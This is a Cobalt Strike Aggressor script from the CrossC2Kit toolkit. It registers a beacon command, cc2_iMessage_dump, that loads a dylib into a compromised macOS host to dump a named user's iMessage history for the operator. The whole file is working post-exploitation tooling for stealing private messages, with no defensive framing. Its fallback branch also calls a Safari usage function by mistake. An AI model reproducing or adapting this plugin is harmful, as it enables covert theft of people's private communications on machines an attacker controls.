
include(script_resource("CrossC2Kit.cna"));

sub printUsage_iMessage_dump {
    blog($1, "\nUsage: cc2_iMessage_dump <username> <dump count>\n\tdump message from iMessage.\nEx:\n\tcc2_iMessage_dump test 100");
}

ssh_alias cc2_iMessage_dump {
    $taskName = "cc2_iMessage_dump"; # taskName
    $taskType = "dylib";  # $taskType -> ELF, MachO, so, dylib
    $taskResType = "info"; # keystrokes -> keylogger message

    $beaconid = $1;
    $username = $2;
    $queryCount = $3;
    $transportArg = $username."^".$queryCount;

    if ($username && $queryCount) {
        $loadlib = "gather/message/iMessage_dump.dylib";
        blog($beaconid, "cc2_iMessage_dump: ");
        bcrossc2_load_dyn($beaconid, $taskType, $taskName, $taskResType, $loadlib, $transportArg);
    } else {
        printUsage_safari_dump($beaconid);
    }

}

ssh_command_register("cc2_iMessage_dump", "CrossC2 iMessage dump - dump message from iMessage.", "\nUsage: cc2_iMessage_dump <username> <dump count>\n\tdump message from iMessage.\nEx:\n\tcc2_iMessage_dump test 100");